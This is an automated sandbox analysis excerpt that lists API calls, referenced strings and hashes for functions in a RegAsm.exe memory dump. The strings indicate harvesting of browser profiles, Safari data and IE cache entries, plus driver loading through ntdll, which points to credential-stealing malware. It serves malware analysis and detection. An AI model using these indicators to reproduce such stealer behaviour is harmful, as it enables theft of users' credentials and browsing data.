                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                  APIs
                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                  • API String ID: 577499730-1134094380
                                                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                  • API String ID: 2787044678-1921111777
                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                  • API String ID: 2080319088-3046471546
                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                  APIs
                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                  • memset.MSVCRT ref: 00413292
                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                  • memset.MSVCRT ref: 00413310
                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                  Strings
                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                  • API String ID: 4111938811-1819279800
                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                  • String ID:
                                                                                  • API String ID: 829165378-0
                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                  • memset.MSVCRT ref: 00404200
                                                                                  • memset.MSVCRT ref: 00404215
                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                  • API String ID: 2454223109-1580313836
                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                  APIs
                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                  • API String ID: 4054529287-3175352466
                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                  • API String ID: 667068680-2887671607
                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                  • API String ID: 2000436516-3842416460
                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                  APIs
                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                  • String ID:
                                                                                  • API String ID: 1043902810-0
                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                  APIs
                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                  • API String ID: 3849927982-2252543386
                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                  APIs
                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                  • API String ID: 2899246560-1542517562
                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                  APIs
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                  • memset.MSVCRT ref: 00408606
                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
